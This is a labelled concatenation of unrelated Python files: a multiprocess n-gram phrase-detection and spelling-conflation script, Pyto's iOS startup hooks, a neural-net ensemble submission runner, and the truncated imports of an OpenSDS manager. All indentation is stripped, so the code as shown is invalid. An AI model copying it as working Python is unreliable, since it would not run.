infolder = sys.argv[1];
#freqDB = sys.argv[2];
phrfile = sys.argv[2];
trafile = sys.argv[3];
modfile = sys.argv[4];
CNT = 0; TRE = 1; PRO = 2;
_langs = ['af','ar','bg','bn','ca','cs','cy','da','de','el','en','es','et','fa','fi','fr','gu','he','hi','hr','hu','id','it','ja','kn','ko','lt','lv',
'mk','ml','mr','ne','nl','no','pa','pl','pt','ro','ru','sk','sl','so','sq','sv','sw','ta','te','th','tl','tr','uk','ur','vi','zh-cn','zh-tw',None];
_max_len_ = 4;
_n_ = 3;
_jobs = 64;
_jobs2 = 64;
_batch = 10000;
_batch2 = 10000;
WORD = re.compile(r'(\b[^\s]+\b)');
CHAR = re.compile(r'([A-Za-z]|ß|ö|ü|ä)+');
LEGAL = regex.compile(r'\p{L}+')
#########################################################################################################################################
# FUNCTIONS #############################################################################################################################
def ngrams(seq,n):
return [tuple(seq[i-n:i]) for i in range(n,len(seq)+1) ];
def probs_leq(p,c,tree):
return [(w,w_) for w in tree for w_ in tree[w][TRE] if tree[w][TRE][w_][PRO]>=p and tree[w][PRO]>=c];
def make_tree(d):
tree = dict();
for ngram in d:
if len(ngram) == 2:
if ngram[0] in tree:
tree[ngram[0]][CNT] += d[ngram];
if ngram[1] in tree[ngram[0]][TRE]:
tree[ngram[0]][TRE][ngram[1]][CNT] += d[ngram];
else:
tree[ngram[0]][TRE][ngram[1]] = [d[ngram],dict(),0];
else:
tree[ngram[0]] = [d[ngram],{ngram[1]:[d[ngram],dict(),0]},0];
divisor = float(sum([tree[w][CNT] for w in tree]));
for w in tree:
tree[w][PRO] = tree[w][CNT] / divisor;
for w_ in tree[w][TRE]:
tree[w][TRE][w_][PRO] = float(tree[w][TRE][w_][CNT]) / tree[w][CNT];
return tree;
def make_tree_(d):
tree = [0,dict(),1];
for ngram in d:
freq = d[ngram];
current = tree;
current[0] += freq;
for term in ngram:
if not term in current[1]:
current[1][term] = [0,dict(),None];
current[1][term][0] += d[ngram];
current = current[1][term];
current = tree;
add_probs(tree[1],tree[0]);
return tree;
def add_probs(children,count):
for child in children:
children[child][2] = children[child][0] / count;
add_probs(children[child][1],children[child][0]);
def get_entropy(path,children):
for child in children:
path_ = path + [child];
entro = entropy([children[child][1][node][2] for node in children[child][1]]);
print(path_,entro);
get_entropy(path_,children[child][1]);
def get_splits(path,children,D,concat,thr,power):
for child in children:
H = entropy([children[child][1][node][2] for node in children[child][1]]);
score = H / len(child)**power; # If normalized entropy is above the threshold then we do NOT split
path_ = path[:-1]+[path[-1]+child] if len(path)>=1 and concat else path+[child];
if score > 0: print(path_,score);
get_splits(path_,children[child][1],D,score>thr,thr,power);
if len(path_) >= 2:
options = [''.join(path_[:i+1]) for i in range(len(path_))]
D[''.join(path_)] = options;
def combine_counters(counters):
c = Counter();
i = 0;
for counter in counters:
i += 1;
if i % 50 == 0:
print(i);
for term in counter:
c[term] += counter[term];
return c;
def display(p,c,tree,inversed=False):
if inversed:
for w,w_ in probs_leq(p,c,tree):
print('(inv)', w_,w, tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO]);
else:
for w,w_ in probs_leq(p,c,tree):
print('(std)', w,w_, tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO]);
def transitive_closure(M): # WARNING: Not for large M!
labels = connected_components(M)[1];
closure = csr(labels==labels[:,None]);
return closure;
def term_transitions(replace,DIST='damerau'):
index2term = list(set([item for item in replace.keys()]) | set([item for item in replace.values()]));
term2index = {index2term[i]:i for i in range(len(index2term))};
rows, cols = zip(*[[term2index[item[0]],term2index[item[1]]] for item in replace.items()]);
R = csr((np.ones(2*len(rows)),(rows+cols,cols+rows)),dtype=bool,shape=(len(index2term),len(index2term)));
labels = connected_components(R)[1];
sorting = np.argsort(labels);
labels_s = labels[sorting];
_, starts = np.unique(labels_s,return_index=True);
sizes = np.diff(starts);
groups = [group for group in np.split(sorting,starts[1:]) if group.size > 1];
transition = dict();
for group in groups:
sum_group = float(sum([d[(index2term[index],)] for index in group]));
max_index = None;
max_freq = 0;
for index in group:
predict_term = index2term[index];
predict_freq = d[(predict_term,)];
if predict_freq > max_freq:
max_freq = predict_freq;
max_index = index;
for index1 in group:
given_term = index2term[index1];
len_1 = len(given_term);
transition[given_term] = dict();
for index2 in [index1,max_index]:
predict_term = index2term[index2];
len_2 = len(predict_term);
sim_prefix = prefix_normed( given_term,predict_term,len_1,len_2 );
sim_similar = similarity_normed( given_term,predict_term,len_1,len_2,DIST );
transition[given_term][predict_term] = (d[(predict_term,)]/sum_group) * sim_similar;#(sim_similar+sim_prefix)/2;
sum_sim = sum([transition[given_term][predict_term] for predict_term in transition[given_term]]);
for predict_term in transition[given_term]:
transition[given_term][predict_term] /= sum_sim;
for index2 in [index1,max_index]:
print(given_term, '-->', index2term[index2], transition[given_term][index2term[index2]]);
return transition;
def apply_replace(index2term,replacements):
if len(replacements) == 0:
return dict();
term2index = {index2term[i]:i for i in range(len(index2term))};
rows,cols,sims = zip(*replacements);
R = csr((np.ones(2*len(rows)),(rows+cols,cols+rows)),dtype=bool,shape=(len(index2term),len(index2term)));
labels = connected_components(R)[1];
sorting = np.argsort(labels);
labels_s = labels[sorting];
_, starts = np.unique(labels_s,return_index=True);
sizes = np.diff(starts);
groups = [group for group in np.split(sorting,starts[1:]) if group.size > 1];
replace = dict();
for group in groups:
terms = [index2term[i] for i in group];
repre = max([(d[(term,)],term) for term in terms])[1];
for term in terms:
if term != repre:
replace[term] = repre;
return replace;
def replace_by_prefix(index2term,threshold,window):
replacements = set([]);
for i in range(len(index2term)-window):
len_1 = len(index2term[i]);
for j in range(1,window+1):
len_2 = len(index2term[i+j]);
percent = prefix_normed(index2term[i],index2term[i+j],len_1,len_2);
if percent > threshold:
replacements.add((i+j,i,percent,));
return replacements;
def replace_by_similar_(index2term,threshold,window,DIST):
replacements = set([]);
for i in range(len(index2term)-window):
len_1 = len(index2term[i]);
for j in range(1,window+1):
len_2 = len(index2term[i+j]);
percent = similarity_normed(index2term[i],index2term[i+j],len_1,len_2,DIST);
if percent > threshold:
replacements.add((i+j,i,percent,));
return replacements;
def replace_by_similar(index2term,threshold,window,DIST,compared):
replacements = set([]);
manager = MP.Manager();
tasks = manager.Queue();
results = manager.Queue();
T = [];
for i in range(len(index2term)-window):
T += [(i+j,i,index2term[i],index2term[i+j],len(index2term[i]),len(index2term[i+j]),threshold,DIST,) for j in range(1,window+1) if not (index2term[i+j],index2term[i],) in compared];
if len(T) > _batch2:
compared |= set([(index2term[ij],index2term[i],) for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T]);
tasks.put(T);
T = [];
if len(T) != 0:
tasks.put(T);
workers = [MP.Process(target=get_similarity_normed,args=(tasks,results,x,)) for x in range(_jobs2)];
for worker in workers:
worker.start();
for x in range(_jobs2):
result = results.get();
replacements |= result;
#print 'Got result', x;
for x in range(len(workers)):
workers[x].join();
#print 'Joined worker', x;
return replacements, compared;
def get_similarity_normed(tasks,results,x):
replacements = set([]);
while True:
print(x,'says: Approximate number of jobs in queue:', tasks.qsize());
try:
T = tasks.get(timeout=3);
#print x,'says: Got', len(T), 'tasks to do...';
except:
break;
for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T:
percent = similarity_normed(term_i,term_ij,len_1,len_2,DIST);
if percent > threshold:
replacements.add((ij,i,percent,));
#print x,'says: Done with this set of tasks.';
#print 'Closing job', x;
results.put(replacements);
return 0;
def prefix_normed(term1,term2,len_1,len_2):
prefix = os.path.commonprefix([term1,term2]);
is_prefix = len(prefix)==min([len_1,len_2]);
return float(len(prefix))/max([len_1,len_2]) if is_prefix else 0.0;
def is_prefix(term1,term2):
return term1 == term2[:len(term1)];
def make_affixes(terms):
prefixed = {terms[0]:[(terms[0],0,)]};
for i in range(len(terms)-1):
affixes = [];
pointer = 0;
for prefix,interval in prefixed[terms[i]]:
if len(prefix) >= 2 and interval < 10000 and is_prefix(prefix,terms[i+1][pointer:]): # reusing previous prefix
affixes += [(prefix,interval+1,)];
pointer += len(prefix);
else:
break;
affixes += [(terms[i+1][pointer:],0,)]; # new prefix
prefixed[terms[i+1]] = affixes;
return prefixed;
def similarity_normed(term1,term2,len_1,len_2,DIST):
distance = damerau_dist(term1,term2) if DIST=='damerau' else edit_dist(term1,term2);
return 1.-(float(distance)/max([len_1,len_2]));
def edit_dist(s1,s2):
if len(s1) > len(s2):
s1, s2 = s2, s1;
distances = list(range(len(s1) + 1));
for i2, c2 in enumerate(s2):
distances_ = [i2+1];
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1]);
else:
distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])));
distances = distances_;
return distances[-1];
def damerau_dist(s1,s2):
oneago = None;
thisrow = list(range(1,len(s2)+1))+[0];
for x in range(len(s1)):
twoago, oneago, thisrow = oneago, thisrow, [0]*len(s2)+[x + 1];
for y in range(len(s2)):
delcost = oneago[y] + 1;
addcost = thisrow[y-1] + 1;
subcost = oneago[y-1] + (s1[x]!=s2[y]);
thisrow[y] = min(delcost,addcost,subcost);
if (x>0 and y>0 and s1[x]==s2[y-1] and s1[x-1]==s2[y] and s1[x]!=s2[y]):
thisrow[y] = min(thisrow[y],twoago[y-2]+1);
return thisrow[len(s2)-1];
def all_partitions(seq):
for cutpoints in range(1 << (len(seq)-1)):
result = []
lastcut = 0
for i in range(len(seq)-1):
if (1<<i) & cutpoints != 0:
result.append(seq[lastcut:(i+1)])
lastcut = i+1
result.append(seq[lastcut:])
yield result
def conflate(affixes,d,tree):
max_score = 0;
max_part = None;
for partitioning in all_partitions(affixes):
summ = 0;
prob = 1;
for j in range(len(partitioning)):
affix = ''.join(partitioning[j]);
prob *= -np.log(tree[partitioning[j][-1]][1][partitioning[j+1][0]][2]) if j+1 < len(partitioning) else 1;#tree[partitioning[j][-1]][2];
summ += d[(affix,)]**len(affix);
score = summ / prob;
if score > max_score:
max_score = score;
max_part = [''.join(partition) for partition in partitioning];
return max_part;
def replace_in_d(d,replace,threshold):
denom = float(sum([d[key] for key in d]));
d_ = Counter();
for tup in d:
d_[tuple([replace[term] if term in replace and d[term]/denom < threshold else term for term in tup])] += d[tup];
return d_;
def add_in_d(d,transition):
new_d = dict();
for tup in d:
options = [els for els in itertools.product(*[[(term2,transition[term1][term2],) for term2 in transition[term1]] if term1 in transition else [(term1,1.,)] for term1 in tup])]
for option in options:
tup_, weights = zip(*option);
new_d[tup_] = functools.reduce(operator.mul,weights,1)*d[tup];
d_ = {tup:new_d[tup] if tup in new_d else d[tup] for tup in set(d.keys())|set(new_d.keys())};
return d_;
def build_counts(Q,R,x,):
print('started', x);
d, d_inv, dl, dl_inv = Counter(), Counter(), {lang:Counter() for lang in _langs}, {lang:Counter() for lang in _langs};
while True:
print(x,'says: Approximate number of jobs in queue:', Q.qsize());
try:
rows = Q.get(timeout=3);
except:
break;
titles = [[term.strip().lower() for term in re.findall(WORD,row[0])] for row in rows if not row[0]==None];
for title in titles:
if len(title)==0: continue;
titstr = ' '.join(title).strip();
lang = None;
try:
lang = detect(titstr);
except:
print(titstr);
for n in range(1,_n_):
for ngram in ngrams(title,n):
zgram = tuple(reversed(ngram));
d[ngram] += 1;
d_inv[zgram] += 1;
dl[lang][ngram] += 1;
dl_inv[lang][zgram] += 1;
if len(d) > 100000:
R.put((d,d_inv,dl,dl_inv,));
d, d_inv, dl, dl_inv = Counter(), Counter(), {lang:Counter() for lang in _langs}, {lang:Counter() for lang in _langs};
print('Closing job', x);
R.put((d,d_inv,dl,dl_inv,));
return 0;
def feed(Q,infolder):
for inDB in os.listdir(infolder):
print(infolder+inDB);
con_title = sqlite3.connect(infolder+inDB);
cur_title = con_title.cursor();
cur_title.execute("SELECT c1 || ' ' || c2 || ' ' || c3 || ' ' || c4 FROM representations");
i = 0;
while True:
i += 1; print(i*_batch);
rows = cur_title.fetchmany(_batch);
if len(rows) == 0:
break;
Q.put(rows);#Q.put(row[0]);
while Q.qsize() > 1000:
time.sleep(1);
con_title.close();
return 0;
def entropy(dist):
return -sum([prob*math.log(prob,2) for prob in dist]);
#########################################################################################################################################
# SCRIPT ##########ä#####################################################################################################################
manager = MP.Manager();
Q = manager.Queue();
R = manager.Queue();
feeder = MP.Process(target=feed,args=(Q,infolder,));
workers = [MP.Process(target=build_counts,args=(Q,R,x,)) for x in range(_jobs)];
feeder.start(); time.sleep(5);
for worker in workers:
worker.start();
feeder.join();
for x in range(len(workers)):
workers[x].join();
print('Joined worker', x);
counts = [];
while not R.empty():
result = R.get();
counts.append(result);
print('Combining results');print(1);
d = combine_counters((counts[x][0] for x in range(len(counts))));#sum((counts[x][0] for x in range(len(counts))),Counter());print(2);
d_inv = combine_counters((counts[x][1] for x in range(len(counts))));
dl = {lang: combine_counters((counts[x][2][lang] if lang in counts[x][2] else Counter() for x in range(len(counts)))) for lang in _langs}
dl_inv = {lang: combine_counters((counts[x][3][lang] if lang in counts[x][3] else Counter() for x in range(len(counts)))) for lang in _langs}
print('Done combining results.');
#input('Press Enter to continue...');
#########################################################################################################################################
_threshold_prefix = 0.75#0.8; #TODO: These thresholds might be different for each typ
_window_prefix = 1;
_threshold_similar = 0.8#.875; #TODO: Try out what are the best ones for each type!
_window_similar = 20;
_distance = 'damerau'; #'edit'
terms = sorted([gram[0] for gram in d if len(gram)==1]);
index2term = copy(terms);
term2index = {terms[i]:i for i in range(len(terms))};
term2index_ = copy(term2index);
replace = dict();
sim_prefix = dict();
sim_similar = dict();
num_replace = 99;
compared = set();
while num_replace > 0:
print(1);
replace_prefix = replace_by_prefix( terms,_threshold_prefix,_window_prefix);
print(2);
replace_similar, compared = replace_by_similar(terms,_threshold_similar,_window_similar,_distance,compared);
#replace_edit = replace_by_similar(terms,_threshold_similar,_window_similar,'edit');
print(3);
replace_new = apply_replace(terms,replace_prefix|replace_similar);
print(4);
num_replace = len(replace_new);
print(5);
only_prefix = [(terms[pair[0]],terms[pair[1]],) for pair in replace_prefix-replace_similar];
#only_damerau = [(terms[pair[0]],terms[pair[1]],) for pair in replace_similar-replace_edit];
print(6);
replace.update(replace_new);
print(7);
terms = sorted(list(set([replace[term] if term in replace else term for term in terms])));
print(8);
term2index_ = {terms[i]:i for i in range(len(terms))};
print(num_replace, '(',len(only_prefix),len(compared),')');#, '(',len(only_damerau),')';
transition = term_transitions(replace);
_replace_thr = 1.;#0.00001; The frequency of the replaced item is in no way indicative of wether the replace makes sense or not.
d = add_in_d(d ,transition);#replace_in_d(d, replace,_replace_thr);
d_inv = add_in_d(d_inv,transition);#replace_in_d(d_inv,replace,_replace_thr);
#########################################################################################################################################
tree = make_tree(d);
tree_inv = make_tree(d_inv);
display(1,10,tree);
display(1,10,tree_inv,True);
#########################################################################################################################################
_and_p_ = 0.0005#0.5#0.6;
_and_c_ = 0.000000001#0.0001;
_or_p_ = 0.0003#0.3#0.4;
_or_c_ = 0.000000001#0.0001;
#-------------------------------------------------------------------------------------
#-right-min-left-min------------------------------------------------------------------
set_std = set(probs_leq(_and_p_,_and_c_,tree));
set_inv = set([tuple(reversed(el)) for el in probs_leq(_and_p_,_and_c_,tree_inv)]);
inter = set_std & set_inv;
#-------------------------------------------------------------------------------------
#-right-certain-left-min--------------------------------------------------------------
set_std_ = set(probs_leq(1.0,_or_c_,tree));
set_inv_ = set([tuple(reversed(el)) for el in probs_leq(_or_p_,_or_c_,tree_inv)]);
inter_ = set_std_ & set_inv_;
#-left-certain-right-min--------------------------------------------------------------
#-------------------------------------------------------------------------------------
set_std__ = set(probs_leq(_or_p_,_or_c_,tree));
set_inv__ = set([tuple(reversed(el)) for el in probs_leq(1.0,_or_c_,tree_inv)]);
inter__ = set_std__ & set_inv__;
#-------------------------------------------------------------------------------------
union = inter | inter_ | inter__;
#-------------------------------------------------------------------------------------
print(union);
print(len(inter), '+', len(inter_), '->', len(inter|inter_), '+', len(inter__), '->', len(union));
OUT = open(phrfile,'w');
for tup in union:
OUT.write(tup[0]+' '+tup[1]+'\n');
OUT.close();
OUT = open(trafile,'w');
for key in replace:
OUT.write(key+' '+replace[key]+'\n');
OUT.close();
#OUT = open(modfile,'w');
#for term1 in transition:
# for term2 in transition[term1]:
# OUT.write(term1+' '+term2+' '+str(transition[term1][term2])+'\n');
#OUT.close();
#########################################################################################################################################
terms = terms;
terms_inv = sorted([term[::-1] for term in terms]);
affixes_of = make_affixes(terms);
suffixes_of = make_affixes(terms_inv);
suffixes_of = {key[::-1]:[(affix[::-1],num,) for affix,num in suffixes_of[key][::-1]] for key in suffixes_of}
agrams = ([(affixes_of[term][i][0],affixes_of[term][i+1][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][-1][0],)] if len(affixes_of[term])>=2 else [(affixes_of[term][-1][0],)] for term in affixes_of);
agrams = [gram for grams in agrams for gram in grams];
zgrams = ([(affixes_of[term][i+1][0],affixes_of[term][i][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][0][0],)] if len(affixes_of[term])>=2 else [(affixes_of[term][0][0],)] for term in affixes_of);
zgrams = [gram for grams in zgrams for gram in grams];
tree = make_tree(Counter(agrams));
tree_inv = make_tree(Counter(zgrams));
affixes_of_ = dict();
count = 0;
for term in affixes_of:
count += 1;
if count == 1000000:
pass;#break;
affixes_of_[term] = [];
current = affixes_of[term][0];
for i in range(len(affixes_of[term])):
if i == len(affixes_of[term])-1:
affixes_of_[term] += [current];
elif not (affixes_of[term][i],affixes_of[term][i+1],) in inter_:
current += affixes_of[term][i+1];
else:
affixes_of_[term] += [current];
current = affixes_of[term][i+1];
print(affixes_of_[term]);
agram_counter = Counter();
for term in affixes_of:
affixes = [affix for affix,dist in affixes_of[term]];
for i in range(len(affixes)):
ngram = tuple(affixes[:i+1]);#+[None for j in range(i+1,len(affixes))]);
agram_counter[ngram] = d[(''.join([gram for gram in ngram if gram!=None]),)];
print(ngram,d[(term,)]);#d[(''.join([gram for gram in ngram if gram!=None]),)]);
tree = make_tree_(agram_counter);
splits = dict();
get_splits([],tree[1],splits,True,0.01,3);
leftovers = set();
for key in splits:
LIST = [''] + splits[key];
PARTS = [LIST[i][len(LIST[i-1]):] for i in range(len(LIST))][1:];
leftovers.add(PARTS[-1]);
terms_inv = sorted([term[::-1] for term in leftovers]);
suffixes_of = make_affixes(terms_inv);
suffixes_of = {key[::-1]:[(affix[::-1],num,) for affix,num in suffixes_of[key][::-1]] for key in suffixes_of}
zgram_counter = Counter();
for term in suffixes_of:
suffixes = [affix for affix,dist in suffixes_of[term]];
for i in range(len(suffixes)):
ngram = tuple(suffixes[:i+1]);#+[None for j in range(i+1,len(affixes))]);
key = ''.join([gram for gram in ngram if gram!=None]);
zgram_counter[ngram] = d[(key,)] if (key,) in d else 0.000000001;
#print(ngram,d[(term,)]);#d[(''.join([gram for gram in ngram if gram!=None]),)]);
tree_inv = make_tree_(zgram_counter);
splits_inv = dict();
get_splits([],tree_inv[1],splits_inv,True,0.01,3);
splittings = dict();
for key in splits:
LIST = [''] + splits[key];
PARTS = [LIST[i][len(LIST[i-1]):] for i in range(len(LIST))][1:];
ENDS = [''] + splits_inv[PARTS[-1]] if PARTS[-1] in splits_inv else ['',PARTS[-1]];
PARTS_ = [ENDS[i][len(ENDS[i-1]):] for i in range(len(ENDS))][1:];
SPLITS = PARTS[:-1]+PARTS_;
print('--------------------');
additionals = [PART for PART in PARTS_ if (PART,) in d and len(PART)>2 and d[(PART,)]>50];
additionals_ = [PART for PART in [''.join(ngram) for ngram in ngrams(PARTS_,2)+ngrams(PARTS,3)+ngrams(PARTS,4)] if (PART,) in d and len(PART)>2 and d[(PART,)]>0];
prefixes = [''.join(PARTS [:i]) for i in range(1,len(PARTS )+1)];
suffixes = [''.join(SPLITS[:i]) for i in range(1,len(SPLITS)+1)];
print(set(prefixes+additionals+additionals_));
splittings[key] = set(prefixes+additionals+additionals_);
OUT = open(modfile,'w');
for term in splittings:
OUT.write(term+' '+' '.join((split for split in splittings[term] if split != term))+'\n');
OUT.close();
'''
for root in tree[1]:
print('---------------------------------------\n'+root+'\n---------------------------------------');
print(tree[1][root]);
print('---------------------------------------\n');
lines_ = [];
for line in lines:
if len(line)<=1:
lines_.append(line);
continue;
else:
line_ = [];
bigrams = ngrams(line,2);
phrase = bigrams[0][0];
for bigram in bigrams:
if bigram in union:
phrase += '_'+bigram[1];
else:
line_ += [phrase];
phrase = bigram[1];
if len(line_)==0 or not line_[-1].endswith(phrase): line_.append(phrase);
lines_.append(line_);
reps = [];
for i in range(len(lines_)):
rep = set([string for string in lines_[i] if len(string)>=3]) - illeg;
reps.append(rep);
for i in range(len(reps)):
if len(reps[i])>_max_len_:
rep = set([tup[1] for tup in sorted([(d[el],el) for el in rep])][:_max_len_]);
'''
|
Startup.py | import sys
import os
sys.path.insert(-1, os.path.expanduser("~/Documents"))
sys.path.insert(-1, os.path.expanduser("~/Documents/modules"))
import io
import console
import code
import pyto
from importlib.machinery import SourceFileLoader
import importlib
import threading
from time import sleep
from outputredirector import Reader
from extensionsimporter import *
import warnings
import logging
from _ios_getpass import getpass as _ios_getpass
import getpass
import webbrowser
import sharing
import _signal
from pip import BUNDLED_MODULES
# MARK: - Warnings
logging.basicConfig(level=logging.INFO)
def __send_warnings_to_log__(message, category, filename, lineno, file=None, line=None):
try:
warnings
except:
import warnings
try:
pyto
except:
import pyto
_message = warnings.formatwarning(message, category, filename, lineno, line)
try:
pyto.PyOutputHelper.printWarning(_message, script=threading.current_thread().script_path)
except AttributeError:
pyto.PyOutputHelper.printWarning(_message, script=None)
return
warnings.showwarning = __send_warnings_to_log__
pyto.Python.shared.version = sys.version
# MARK: - Allow / Disallow subprocesses
os.allows_subprocesses = (not sys.platform == "ios")
# MARK: - Input
def askForInput(prompt=None):
try:
threading
except NameError:
import threading
try:
console
except NameError:
import console
if (threading.currentThread() in console.ignoredThreads):
return ""
else:
return console.input(prompt)
__builtins__.input = askForInput
getpass.getpass = _ios_getpass
# MARK: - Output
def read(text):
try:
console
except NameError:
import console
console.print(text, end="")
standardOutput = Reader(read)
standardOutput._buffer = io.BufferedWriter(standardOutput)
standardError = Reader(read)
standardError._buffer = io.BufferedWriter(standardError)
sys.stdout = standardOutput
sys.stderr = standardError
# MARK: - Web browser
class MobileSafari(webbrowser.BaseBrowser):
'''
Mobile Safari web browser.
'''
def open(self, url, new=0, autoraise=True):
sharing.open_url(url)
return True
webbrowser.register("mobile-safari", None, MobileSafari("MobileSafari.app"))
# MARK: - Modules
for importer in (NumpyImporter, MatplotlibImporter, PandasImporter, PillowImporter, BiopythonImporter, LXMLImporter, ScipyImporter, SkLearnImporter, SkImageImporter, PywtImporter, NaclImporter):
sys.meta_path.insert(0, importer())
# MARK: - Pre-import modules
def importModules():
try:
import PIL.ImageShow
def show_image(image, title=None, **options):
import os
import tempfile
import sharing
imgPath = tempfile.gettempdir()+"/image.png"
i = 1
while os.path.isfile(imgPath):
i += 1
imgPath = os.path.join(tempfile.gettempdir(), 'image '+str(i)+'.png')
image.save(imgPath, "PNG")
if title == "OpenCV":
sharing.quick_look(imgPath, remove_previous=True)
else:
sharing.quick_look(imgPath)
PIL.ImageShow.show = show_image
except ImportError:
pass
threading.Thread(target=importModules).start()
# MARK: - Create a Selector without class.
__builtins__.Selector = pyto.PySelector.makeSelector
__builtins__.Target = pyto.SelectorTarget.shared
# MARK: - Deprecations
__builtins__.deprecated = []
# MARK: - Pip bundled modules
if pyto.PipViewController != None:
pyto.PipViewController.bundled = BUNDLED_MODULES
# MARK: - OS
def fork():
pass
def waitpid(pid, options):
return (-1, 0)
os.fork = fork
os.waitpid = waitpid
# MARK: - Handle signal called outside main thread
old_signal = _signal.signal
def signal(signal, handler):
try:
threading
except NameError:
import threading
if threading.main_thread() == threading.current_thread():
return old_signal(signal, handler)
else:
return None
_signal.signal = signal
# MARK: - Run script
pyto.Python.shared.isSetup = True
while True:
try:
SourceFileLoader("main", "%@").load_module()
except Exception as e:
print(e)
|
submission.py | from __future__ import print_function
import grasp
import ensemble
import importlib
import sys
import os
import subprocess
from multiprocessing import Process
import yaml
import json
import argparse
with open("SETTINGS.json") as file:
config = json.load(file)
with open("final_nets.yml") as file:
all_net_kwargs = yaml.load(file)
for x in all_net_kwargs:
if ('dropch' in x) and x.pop('dropch'):
x['ch'] = range(2,32)
def check_output_names(net_kwargs):
names = set()
for kwargs in net_kwargs:
name = kwargs["output_name"]
if name in names:
raise ValueError("duplicate output name", name)
names.add(name)
check_output_names(all_net_kwargs)
# We weighted know good results (0.97+ on public leaderboard by 2 relative to the
# the other results).
ensemble_weights = { 'net_stf7.csv':2,
"net_stf7b.csv":2,
"net_stf7i.csv":2,
'net_stf7m.csv':2,
'net_stf7_fea6_150e20_LPF_00_100_dense1024_val6_allfreqdata.csv':2,
# We intended to weight this net by two, but another net that
# was supposed to be in here net_stf7m_v3i somehow ended up
# being replaced by a duplicate of net_stf7b_v3i so it was
# effectively weighted by 4.
'net_stf7b_v3i.csv' : 4,
}
def run_only_kwargs(kwargs):
kwargs = kwargs.copy()
for key in ['min_freq', 'max_freq', 'validation', "train_size", "valid_size"]:
_ = kwargs.pop(key, None)
return kwargs
def run_net(i, run_type="run"):
kwargs = all_net_kwargs[i].copy()
print("*"*64)
mod_name = kwargs.pop("net")
output_name = kwargs.pop("output_name")
dump_path = os.path.join(config["MODEL_PATH"], output_name) + ".dump"
csv_path = os.path.join(config["SUBMISSION_PATH"], output_name) + ".csv"
print("Loading module", mod_name, "for net", output_name)
mod = importlib.import_module("nets." + mod_name)
factory = getattr(mod, 'create_net')
if run_type == "dry":
kwargs = run_only_kwargs(kwargs)
items = ["{0}={1}".format(k,v) for (k,v) in sorted(kwargs.items())]
argstring = ", ".join(['None', 'None'] + items)
print("Instantiating:", "{0}.create_net({1})".format(mod_name, argstring))
net = factory(None, None, **kwargs)
print("Would normally dump results to:", csv_path)
else:
if os.path.exists(dump_path):
print(dump_path, "already exists; skipping training")
print("Executing:", "info = load({0})".format(dump_path))
info = grasp.load(dump_path)
else:
if run_type in ("test_dump", "test_csv"):
kwargs["max_epochs"] = 1
kwargs["epoch_boost"] = 0
dump_path += ".test"
csv_path += ".test"
items = ["{0}={1}".format(k,v) for (k,v) in sorted(kwargs.items())]
argstring = ", ".join(["{0}.create_net".format(mod_name)] + items)
print("Executing:", "info = train_all({1})".format(mod_name, argstring))
info = grasp.train_all(factory, **kwargs)
print("Executing:", "dump(info, '{0}')".format(dump_path))
grasp.dump(info, dump_path)
if run_type != "test_dump":
if os.path.exists(csv_path) or os.path.exists(csv_path + ".gz"):
print(csv_path, "already exists; skipping")
return
print("Executing: make_submission(info)")
grasp.make_submission(info, csv_path)
def submitted_net_names():
return [x['output_name'] for x in all_net_kwargs]
def worker(offset, run_type):
# flags = THEANO_FLAGS[offset % len(THEANO_FLAGS)]
env = os.environ.copy()
env["THEANO_FLAGS"] = config["theano_flags"][offset%len(config["theano_flags"])]
n_workers = config["submission_workers"]
for i in range(offset, len(all_net_kwargs), n_workers):
print("processing", all_net_kwargs[i]["output_name"])
print(env["THEANO_FLAGS"] )
output_name = all_net_kwargs[i]["output_name"]
csv_path = os.path.join(config["SUBMISSION_PATH"], output_name) + ".csv"
with open(csv_path + ".log", 'w') as log:
subprocess.check_call(["python", "submission.py", '-r', run_type, '-n', str(i)], stdout=log, env=env
)
if __name__ == "__main__":
help = """
`python submission.py -h` -- list this help message.
`python submission.py -r run -n <N>` -- train net #N.
`python submission.py -r run` -- train all nets. This will take a LONG time.
`python submission.py -r ensemble` -- compute the weighted average used in final submission.
The directories for train, test, dumped models and csv output files are
set in SETTINGS.json.
When running all nets, the programs spreads the load out over `submission_workers`
processes. Mulitple GPUs can be used by specifying an appropriate set of flags in
`theano_flags`. Both of these can be found in SETTINGS.json.
Note that this first checks if the dump file for a given net exists, if so it uses
that, if not, it retrains the net (slow). Then it checks if the csv file exists for
this net, creating it if it doesn't exist.
The submitted nets that are availble to run are:
"""
net_names = "\n".join(" {0}: {1}".format(i, x) for (i, x) in
enumerate(submitted_net_names()))
brief = ("This is the main program to train the neural nets,\n"
"save the nets into model files and generate predictions\n"
"to testing set,and save it to csv output submission files.\n\n")
parser = argparse.ArgumentParser(prog="python submission.py",
formatter_class=argparse.RawDescriptionHelpFormatter,
description=brief+help+net_names)
parser.add_argument('-r','--run_type', help='The run type' , required=True)
parser.add_argument('-n','--net', type=int, help='Neural Net ID', default=-1)
args = parser.parse_args()
run_type = args.run_type
which = args.net
## show values ##
print ("The run type is: %s" % run_type )
print ("The network to train: %s" % which )
if which != -1:
assert run_type in ["run", "test_csv", "test_dump", "dry"], run_type
print("Running net: " + str(which) + " with runtype of: " + str(run_type))
run_net(which, run_type)
else:
if run_type == "ensemble":
output_path = os.path.join(config["SUBMISSION_PATH"], "ensemble.csv")
input_paths = [os.path.join(config["SUBMISSION_PATH"], x["output_name"]) + '.csv' for x in all_net_kwargs]
ensemble.naive_ensemble(output_path, input_paths, ensemble_weights)
print("Running ensemble")
else:
print("Running nets in parallel")
jobs = [Process(target=worker, args=(i, run_type)) for i in range(config["submission_workers"])]
for p in jobs:
p.start()
for p in jobs:
p.join()
|
manager.py | # Copyright 2019 The OpenSDS Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import time
import json
import threading
import log
from utils import base
from utils import config as cfg
from kafka import KafkaConsumer
import pandas as pd
import numpy as np
